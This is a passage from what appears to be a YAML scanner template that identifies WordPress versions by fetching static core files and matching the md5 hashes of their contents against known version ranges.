md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"53683d6a5dd7d32ebb703fce7b894620\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"e08d34a883c155084296c35872e0b382\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/theme-editor.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"b2ee1f0928a71f8621e17f702da4bf15\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"b3772e896c38a69013ebafca1da7a49a\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"19dac48c3c808feb3a3f5e6eb4af11da\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"2c86c9314921ac6acd69e480f092eb65\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"1d469fa64b12915edd13d68148453c72\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"049a5595657f110b9cbbb31cad73b094\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"1a7408da79a9bae4ef8e741f295f9f21\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"4d510f0a9aa612e1e196e5620040a426\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/theme-editor-rtl.css" - matchers: - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"afad874ed34bfb50e3fb57cc20b93d56\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.9.2 - dsl: - - "(\"67937f3a3e8e4b9eeaa5fe15c1cce63b\" == md5(body))" - - type: dsl - name: 2.7 - 2.8 - dsl: - - "(\"2e4be8eba21d8e05e18d9fc03c9a1f6e\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"1cd1b9f3b3477cc40cb2a4b3af29cc0c\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"a3cde5875a5257cc8c910d1a2838e801\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"0ef754d669368b5736ddcadb366d4c05\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/admin-bar.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"541419d7c0122d14d9fd1da3142a25c0\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"5dc8ab63a6a5936550b79bc5287eb229\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"8551c02b4c8c6d91355ff61745f6c164\" == md5(body))" - - type: dsl - name: 3.1.1 - 3.1.4 - dsl: - - "(\"5cee5b5a5cb2bfdc471296741568da9b\" == md5(body))" - - type: dsl - name: 3.1 - dsl: - - "(\"afebbd5ba8b14fdd0397021244066daa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/editor.dev.css" - matchers: - - type: dsl - name: 3.4.2 - dsl: - - "(\"8f375efc2f2a3f703d6ba284f99830d4\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"4ff306aa0f0331e56473dbeef3fbcd51\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/wp-plupload.dev.js" - matchers: - - type: dsl - name: 3.4.2 - dsl: - - "(\"75bd0d965758c849bd27173d7aec1923\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"cedf550582b93e7cf4779203a8a99f2d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/imgareaselect/jquery.imgareaselect.dev.js" - matchers: - - type: dsl - name: 3.4.2 - dsl: - - "(\"7958066469b0a567962a6355d9c5f817\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"db66fc020cd91632a8689214cf532a23\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"6e708a6fb002e7e2b46f0b6ca081ab3d\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"49f263599016025d39f84c17bd6287c2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-lists.dev.js" - matchers: - - type: dsl - name: 3.4.2 - dsl: - - "(\"bb69091155683715d2902019693ceeac\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.1 - dsl: - - "(\"91723a5f56f555a02bcf3e169694f77a\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"c48d5b52db182adec677f77dd6771b53\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"5afcff15a6ae5783bbc49efb8e556eb9\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"3307a4b7fce5e39e3c13f0e3478cbb5d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-preview.dev.js" - matchers: - - type: dsl - name: 3.4.1 - 3.4.2 - dsl: - - "(\"16e10c6310bd62bb63876f0094592ef4\" == md5(body))" - - type: dsl - name: 3.4 - dsl: - - "(\"7ea457381aefb6d20836d3af804af618\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/user-profile.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9a55eb19b2ba406d0c446494f5082362\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"cea2eb0573610ab89618ec3e1104fe87\" == md5(body))" - - type: dsl - name: 3.1.4 - dsl: - - "(\"b2385b31e10f0e05868dc9963f6b5492\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.3 - dsl: - - "(\"aba1c36c2aaa7856f19eb45068260a46\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"284081f3b85fbb4cbaf29ff392924c6c\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"b1ba00820be627f9a5bb9ad51c226c6e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/link.dev.js" - matchers: - - type: dsl - name: 3.4.2 - dsl: - - "(\"573fdbc34e8d60090cd5f5290a677078\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.1 - dsl: - - "(\"e1cab0e9026cb713c471a03159aa8472\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"2886215c2ab637527435c672daa242ab\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"ecf1bfdbf145bdab5a0d61ea4039ef55\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/postbox.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"6feb51918fed2bb0c6b8b470deaa4b1f\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"d2894d1539a2a643cef3407784270551\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"f2b64b5e910458f653b82ad02ca3f519\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"0fd0915b4e9938ea328460378af5b29d\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"ba550af784b2072d39ca2c6eea2eecbb\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"866680547d1d53c6782291784e89f873\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"19bf9fa83624020a518d7bcc8b60c1bd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/edit-comments.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"84faa202d218b1c0df4ada14f9db0121\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"6325c905c75a48653c4d3d0c1dcae7bf\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"5a4f669ae76504682ca496fbde606c88\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"13032daf9f83b9de0aeb220bc4fc1ab2\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"a8ec0a555e4723d13bd14e2f7eda7b44\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"60dec0058dce41d4dd1a97068403709b\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"6b85ab29401b236b7248d2a1aba7f209\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"9b02ddd09ea4d920bcb98e6736fa26ba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/dashboard.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a86e3c459bfdce83b8925f9dc29a7905\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"371dc51fe87c122bbcb9565c9dd0c145\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"6c9a8d6d69c23e49480e9e164b7cdaa5\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"4791431c439486258873301436af176c\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"1d85acc27d25696f9a998f1fe0cb6a79\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.9.2 - dsl: - - "(\"3e3fbecb5bc1fa258a22a6f9a2a534b1\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"9abcfc44be1c15b96453f8b62a5ababf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/content.css" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"03873ff71f4269941d491b480cb10da0\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"9bb2cfc47606f21365635bc442a7f3d3\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"e98feb35e99a6a9f541b2a514079d273\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f42ae068f516911a342284a304411ddb\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"093b2eb2cfc16ba89eebd4869a6d34fe\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"7b4403e4f46a59266dade554f52a4098\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"52d9608bb02c9d6b3201aa5158537156\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"a1b36551d8a606622d8fa44f42850ec7\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.7.1 - dsl: - - "(\"d231e3407c803b11605532828641b0df\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"ebd8fd56a3afb904d89ce735a8aba65b\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"4e054c57589e78fc6b64c25583536967\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/ui.css" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"03ae09e5c5f80f0ed0fc1ebb9c2053f0\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"642e4f5b08ac1ccc1f1d6d956171ee34\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"720a1323be729253347e733580622e36\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"79352a602390ae6d4e3bf6f9c2494173\" == md5(body))" - - type: dsl - name: 2.7 - 3.0.6 - dsl: - - "(\"95f5bbc6ea992fcb641f0275025dc438\" == md5(body))" - - type: dsl - name: 2.5.1 - 2.6.5 - dsl: - - "(\"baddea3389c84a37f2356e47d168d559\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"c11ec4198ab67a1baa9e2d8f515a8629\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui.css" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"af38b0cc9a19f25f95f8776568549442\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"5a48c21bde270739664e9dab7c1143ad\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"c483637b2a5e889bed54a3891035f6e6\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"7b21b4f0a4aaaa3b307727482ac73533\" == md5(body))" - - type: dsl - name: 2.7 - 3.0.6 - dsl: - - "(\"b9db394d414b1d2f0d8930522e676c5d\" == md5(body))" - - type: dsl - name: 2.5.1 - 2.6.5 - dsl: - - "(\"cfcfd4436b87fbfd59b1d1fb2196f25b\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"7778e41dc9384c147e4e1bd44adafa1c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/link.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"316da7ee59e094228df2a4fb7e39cfa6\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"b9afd9f4addc771dd657b10e003ab3fd\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"9f192e4711b35b2fae293ce5d8a1c59e\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"85e3d12f288b9ead43fd6f4e3b341815\" == md5(body))" - - type: dsl - name: 2.5.1 - 2.7.1 - dsl: - - "(\"e4eaaa5fcee50264e9b24370cc802b76\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"19c6f3118728c38eb7779aab4847d2d9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"4de9f6b1aafe968e8509ffe7ee9bc973\" == md5(body))" - - type: dsl - name: 3.7.1 - 3.7.35 - dsl: - - "(\"5d01c0e812cdcd6356b78ee0cb4e5426\" == md5(body))" - - type: dsl - name: 3.5 - 3.7 - dsl: - - "(\"653d4dc2d7c3dbdd9ad409ae3f4c4817\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"23acb7d19b52e8fafaa84c3a342cfe7c\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"8bd9069b943e4433737689d9f59eee16\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editimage.html" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"216788f7dbe172a3d3fb827a05d0f837\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"ff7bbb3f7519ab7cc2a9f7fb2a39ea33\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"bc3a66e8d3e0de62ab83d95bd04f4dae\" == md5(body))" - - type: dsl - name: 3.0 - 3.3.3 - dsl: - - "(\"fdea6dce525ebe71c247690f67d32911\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"60340807d945876ff6da82338c84153a\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"e3b3cebf6d65898314f822f8b8aa90b5\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"568910cba72f8a00a7e9de70bcc62c92\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"f325a73e1da24a2dc91c8ee18199bb02\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"decdce43a5ea753c53801b436614249e\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"0a25f1ee5635ea5c98d12fe6a25124dd\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"b7f2ab839344415015809824e6d1ee27\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"7f739de8ea534faec85258212637313c\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"bf5b713b40828ed678cf3b907c88b3cc\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.9.2 - dsl: - - "(\"bb5ecafedc219aac400807dc283fe273\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"d4866567bb43a5f946d15a560629f063\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/window.css" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"db6490f7f7b6a4e9470eab0856c3122a\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"55f7ce40bd02fc916fc8e2614993d5c5\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"880cfaeb6fd12075583b7bc2781f3d36\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"0fb7cbeaf364b4377fb3126384482aec\" == md5(body))" - - type: dsl - name: 2.5.1 - 2.7.1 - dsl: - - "(\"840e1dcc6263a489e4851a1c7371d48b\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"3008a345f351badd78a6d1ace150c901\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"0ac5f6185d70a460e207752d2bafa974\" == md5(body))" - - type: dsl - name: 3.6.1 - 3.7.35 - dsl: - - "(\"a7d139d6d9506e005e7aee90d5c7918b\" == md5(body))" - - type: dsl - name: 3.6 - dsl: - - "(\"065e5a8b0d8875768f0b75fc1bf7b6f0\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"ccf5e6012c894a387d6e04300e6d60ed\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"e7a339f2c4da85d8c8fa69173d06012a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/wp-tinymce-schema.js" - matchers: - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"dcb60a584dfa0b64a31c1ee0b67595cf\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"50f4d4fdb09d43ec39f1d730fd398dd1\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"cb88e8f50b53365fb94422e9a269226a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/fonts/dashicons.woff" - matchers: - - type: dsl - name: 4.5 - 5.6 - dsl: - - "(\"0c1c1ad41c025f72592bca820e073bec\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"a880efb5c3ff8d61a495354352f81afb\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"78f5e202fde4da61a50d49b27e747eb2\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"20ae16de66f71648336c8b34f8dce20b\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"f53d2bfd11506f77d1f6cfebe4435c1d\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"c7452d909c0fad4f568191fc5e5c77f5\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"088ab6f8565d3a0bcc6bee7a64fee658\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/thickbox/thickbox.js" - matchers: - - type: dsl - name: 4.6 - 5.6 - dsl: - - "(\"d5d248a8730754587b4224c2d9ad36c7\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"9fe76355c7009a4dccb10bd3e9347775\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"0d7cfe98065dd12946153ed0987fcc44\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"20baaf5da31ddd92caab7962d15c0ac3\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"b4ba824311d86552ddc7fe7753ef8925\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"482a8efb7c72fbecfa29a509121ea263\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"f60e0a316f95a2f31df204a9cef6fe28\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"43e846c82d0eb2e54e55f9bd5b0cd4dd\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"ee978eee2af4a9d56478d4d953c33731\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"e0bb5a88a4b79d0b41e6dfdca1952fa2\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"e545ca18aef12843121c32a1fee44d78\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"254033275c930248aec4603d0a5af004\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"1d8b106fccf7ad647ecfc6cd0d77d304\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"4988c924f8df0898cabbca27c2dc57ef\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"bf6afa6da821fca17b1d36692adb88d6\" == md5(body))" - - type: dsl - name: 2.5 - 2.7 - dsl: - - "(\"e9af66a7ac48c57e85fb3148e2d5951d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/swfupload.swf" - matchers: - - type: dsl - name: 3.6 - 4.8.15 - dsl: - - "(\"bd5a25f23589652ca472d41fe1484f0c\" == md5(body))" - - type: dsl - name: 3.5.2 - dsl: - - "(\"3dc9c7e7c13b2d4edc3ebb7d0e9cdb94\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.5.1 - dsl: - - "(\"c0e5c70af799aeb906b1bef3b11e9a8d\" == md5(body))" - - type: dsl - name: 2.8 - 3.3.1 - dsl: - - "(\"3a1c6cc728dddc258091a601f28a9c12\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"758c0891789a68b465da91f9034a3ec0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/flashmediaelement.swf" - matchers: - - type: dsl - name: 4.6 - 4.8.4 - dsl: - - "(\"2efe1fabfea04432f090ecb3153b10a1\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.5.12 - dsl: - - "(\"e61c004611ce5cc855a3b2ab3e89602d\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.1 - dsl: - - "(\"42c6680f8035fc10855ee2e559c9cc78\" == md5(body))" - - type: dsl - name: 4.3.4 - 4.3.14 - dsl: - - "(\"079d5276459e0e3526afbdb7e1017037\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.3 - dsl: - - "(\"2400c991b8473d44a7edc75605496760\" == md5(body))" - - type: dsl - name: 4.2.8 - 4.2.18 - dsl: - - "(\"bed216acd6fb5318c139087a0a9d6b4d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.7 - dsl: - - "(\"a77bd46c3904a70f0e4ed6f3f714099a\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.21 - dsl: - - "(\"e78dcab5e8dc6bfad93588602a065c8a\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.21 - dsl: - - "(\"7325701f91d0eaa11ec0cc9a6087053f\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"582ba00d7a38795bba1306b30c31a6f1\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.22 - dsl: - - "(\"f82e1f904e12a82ac15c63999427c909\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.24 - dsl: - - "(\"03dc1336e5697e4ceda3a7f4b99b71c7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"f47fbcac042fc512f98220d3eabdc8d5\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"de05e92e39dd7c54887e9aff05928ae2\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"ebe1a8076493805aa48fc343dd86ddb8\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"f0ac357ef35636742935d34c076a805e\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"c78872a5c45c167f9047cf133b1a254d\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"434c0fa5ab62607cf4bf1fc05df759b6\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"3ea0570bc9a465ca82c8c8b2bb4f6905\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"7f2b2879d22aa540d113a4af70999990\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"551a3e9dcf9854a5c5fcaafe716c6202\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"e8997a81c564cf87fdb0d28cee7bdcf1\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"c58284f84f50ed17208769e38fd98a96\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"098fcc8fa903f68d4827a80b19ed8624\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"13e9d45958d1edffdc8eb1942f9473a0\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"5f405904ac0da0f8af0af4d401915af0\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"1f790c5cfc12b650992c164051a09629\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/charmap/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"139897943cd17cda7942e1dc94011aca\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"b450e5710839230572adc66772782a89\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"d995aeaef8197c23cb1e14e3a479bc00\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"1517fb34539b42af182b5e95d9580a1e\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"8a7931011935fc826805265b3228c616\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.4.24 - dsl: - - "(\"a3a422577ac81c9ef6d7036869c30c7b\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"b4f29c072885c987beb19599798babb3\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"61d3e5d077b1d76704eac85c63a148bc\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"6bf9e5219c34728a89e1e0a987e615d0\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"0fa5d493729a82436d20c26acb7fcbca\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"15acd8a331dbf71d226342b71258b015\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"4c3c81756533d703d3bb95ce8f9882a6\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"9bb2e1a85cf507d3355ec0cc0bf9b518\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-views.js" - matchers: - - type: dsl - name: 4.7.3 - 4.8.15 - dsl: - - "(\"122b154b05f13396529c049c1a17d8d1\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.2 - dsl: - - "(\"5abea7b6d9a2556fb8cbfcd3f8d1c0ff\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"fab2f195182995d82502a8ab7f0c79d9\" == md5(body))" - - type: dsl - name: 3.9.1 - 4.2.29 - dsl: - - "(\"ad923bbd7a9caf098f594d0e912379c8\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"0aeeca504e00db4a8bef755c7a85a4fa\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"1e619b769bf8f798e13112e221949e02\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"22729b3c60a2f3c416c5f944cd01e285\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-audiovideo.min.js" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"f093100d539f03b5d1d31f1e74029b44\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.19 - dsl: - - "(\"aedd794ce915a1b424abcfa487a27876\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.24 - dsl: - - "(\"adff9c3836284891ee9c5f4eacc4c708\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"41ee8d23e04975b16e3fb8d8e949b958\" == md5(body))" 